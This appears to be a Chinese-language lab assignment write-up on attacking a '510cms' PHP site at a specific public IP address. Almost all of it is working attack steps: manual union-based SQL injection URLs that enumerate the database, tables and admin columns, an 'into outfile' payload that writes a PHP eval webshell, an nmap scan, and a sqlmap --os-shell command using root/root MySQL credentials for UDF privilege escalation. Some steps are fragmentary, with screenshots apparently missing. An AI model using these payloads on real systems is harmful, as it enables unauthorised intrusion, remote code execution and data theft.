1、510cms使用手工注入挂下一句话木马。操作步骤配截图。
http://159.75.16.25:88/about.php?listid=6 正常页面
http://159.75.16.25:88/about.php?listid=6‘ 异常页面
http://159.75.16.25:88/about.php?listid=6 and 1=1 – + 正常页面
http://159.75.16.25:88/about.php?listid=6 and 1=2 – + 异常页面
可以判断出为整形注入。
判断列数: http://159.75.16.25:88/about.php?listid=6 order by 7 --+ 为7位
判断显示位http://159.75.16.25:88/about.php?listid=6 and 1=2 union select 1,2,3,4,5,6,7 – + 第四位是显示位
查看数据库:http://159.75.16.25:88/about.php?listid=6 and 1=2 union select 1,2,3,database(),5,6,7 – + 510cms
求表
http://159.75.16.25:8887/service.php?listid=7%20%20and%201=2%20union%20select%201,2,3,table_name,5,6,7%20from%20information_schema.tables%20%20where%20table_schema=%22510cms%22%20–%20+
http://159.75.16.25:8887/service.php?listid=7 and 1=2 union select 1,2,3,table_name,5,6,7 from information_schema.tables where table_schema=“510cms”
http://159.75.16.25:8887/service.php?listid=7%20%20and%201=2%20union%20select%201,2,3,group_concat(column_name),5,6,7%20from%20information_schema.columns%20where%20table_name=%22510_admin%22%20–%20+
利用SQL注入上传木马拿webshell:
http://159.75.16.25:8887/service.php?listid=7 and 1=2 union select 1,2,3,’<?php @eval($_POST[x]);?>’ ,5,6,7 into outfile ‘var/www/htmlwebshell.php’ – +
2、510cms提权 分别使用navicat和sqlmap进行udf提权,操作步骤配截图。
前提条件:
知道mysql的端口,知道mysql数据库用户名和密码,利用udf漏洞。
nmap -p 3308 159.75.16.25 知道mysql端口3308
由图可知用户名和密码均为root
常规方式:
创建函数:
Sql:
Sqlmap -d “mysql://root:root@159.75.16.25:3308/mysql” –os-shell
文章只进行学习交流,若有违法行为与本人无关。